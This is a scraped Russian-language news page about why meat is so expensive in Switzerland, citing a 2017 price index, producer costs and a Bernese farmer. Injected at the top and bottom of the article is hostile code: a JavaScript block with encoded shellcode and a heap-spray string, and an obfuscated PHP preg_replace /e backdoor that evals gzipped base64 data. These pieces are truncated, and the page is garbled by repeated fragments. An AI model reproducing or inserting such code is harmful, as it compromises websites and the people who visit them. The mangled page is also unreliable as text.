%3cscript> var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580"); var spray = unescape("%u0a0a%u0a0a"); Почему мясо в Швейцарии такое дорогое?
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65 \x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5 GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/
Европейская правда

Почему мясо в Швейцарии такое дорогое?

Почему мясо в Швейцарии такое дорогое?
Почему мясо в Швейцарии такое дорогое?

Почему швейцарское мясо – одно из самых дорогих в мире? Фермеры, группы защиты интересов потребителей и отраслевые эксперты: у них у всех есть на этот счет свое мнение.

Не многие в мире могут позволить себе заплатить почти 50 франков (2 900 рублей) за килограмм говядины из бедренной части или более 20 франков за то же количество свинины на косточке. Но именно таковы цены на эти виды мяса в швейцарских супермаркетах. Согласно опубликованному компанией «Caterwings» индексу мировых цен на мясо в 2017 году, цены на мясо в Швейцарии оказались самыми высокими цены в мире, точнее, на 142% выше среднемирового показателя.

По оценкам «Caterwings» чтобы заработать на 1 кг такой говядины швейцарскому рабочему низкой квалификации нужно проработать 3,1 часа, тогда как такому же работнику из Индии для 1 кг такого же мяса в среднем придется проработать 22,8 часа. В какой-то степени столь высокие розничные цены объясняются в целом высокой стоимостью жизни в Швейцарии, которая сочетается с высокой же покупательной способностью: со швейцарцев «дерут» много, потому что они согласны и в состоянии платить такие цены. 

При ближайшем же рассмотрении выясняется, что особенности ценообразования в мясной отрасли в Швейцарии формируются под влиянием сразу нескольких факторов. По мнению президента «Ассоциации швейцарских производителей говядины» («Swiss Beef CH») Франца Хагенбуха (Franz Hagenbuch) одной из причин такой ситуации частично являются высокие производственные издержки, в числе которых «оплата труда рабочих, стоимость энергии, удобрений, услуг ветеринара, строительные затраты, страхование и стоимость комбикормов».

Кевин Моат, владелец небольшой фермы по производству органической говядины в регионе Тунского озера (кантон Берн), также считает, что производственные и социальные издержки производства в Швейцарии слишком высоки. «В финансовом отношении это может быть весьма трудным делом», — говорит он. «Для маленьких фермерских хозяйств, подобных моему, расходы на страхование, например, порой становятся слишком уж значительными. А сюда входит медицинское страхование, и страхование гражданской ответственности в случае совершения ДТП, пенсионная страховка, так что случись что со мной — проблемы будут у всего фермерского хозяйства».

Почему мясо в Швейцарии такое дорогое?


Передает: Швейцарский новостной информационный портал SwissInfo.ch
Просмотров: 111
  •    

Мы в социальных сетях:    Twitter    FaceBook    Google+

Добавить комментарий








Информация

Комментировать статьи на нашем сайте возможно только в течении 40 дней со дня публикации.

При полном или частичном воспроизведении материалов прямая гиперссылка на сайт www.europravda.com.ua обязательна. Редакция не всегда разделяет мнения публикуемых материалов и не несет ответственности за достоверность и правдивость размещенной информации взятой с открытых источников. В случае необходимости использования текстовых, фото, графических, информационно-графических, видео, аудио и иных размещенных материалов, права на которые принадлежат третьим лицам, необходимо обращаться непосредственно к правообладателям. Если Вы являетесь автором материала или обладателем авторских прав на него и против его использования на сайте europravda.com.ua, пожалуйста свяжитесь с нами. Сайт не рекомендуется для чтения лицам младше + 18 лет. Редакция сайта открыта для сотрудничества, новых идей и предложений. Для связи с нами, пожалуйста используйте форму обратной связи.
<рhp preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65 \x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5 GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/